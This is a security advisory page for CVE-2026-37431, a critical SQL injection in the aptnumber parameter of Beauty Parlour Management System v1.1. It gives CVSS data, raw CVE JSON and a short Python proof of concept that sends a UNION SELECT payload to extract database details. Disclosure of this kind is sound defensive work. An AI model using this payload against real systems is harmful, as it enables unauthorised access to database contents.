Security Vulnerability Report
中文
CVE-2026-37431 CVSS 9.8 CRITICAL

CVE-2026-37431

Published: 2026-05-08 15:16:37
Last Modified: 2026-05-08 19:16:31

Description

Beauty Parlour Management System v1.1 was discovered to contain a SQL injection vulnerability via the aptnumber parameter in the /appointment-detail.php endpoint. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Beauty Parlour Management System v1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-37431 # Description: SQL Injection via 'aptnumber' parameter in /appointment-detail.php target_url = "http://target-ip/appointment-detail.php" payload = "1' UNION SELECT 1, user(), database(), version()--+" params = { "aptnumber": payload } try: response = requests.get(target_url, params=params, timeout=5) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response for database details (user, db, version).") # print(response.text) # Uncomment to debug response else: print("[-] Target did not respond as expected.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37431", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:37.010", "lastModified": "2026-05-08T19:16:30.750", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beauty Parlour Management System v1.1 was discovered to contain a SQL injection vulnerability via the aptnumber parameter in the /appointment-detail.php endpoint. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/Y4y17/CVE/blob/main/Beauty%20Parlour%20Management%20System/SQL%20Injection-2.md", "source": "[email protected]"}, {"url": "https://github.com/Y4y17/CVE/blob/main/Beauty%20Parlour%20Management%20System/SQL%20Injection-2.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}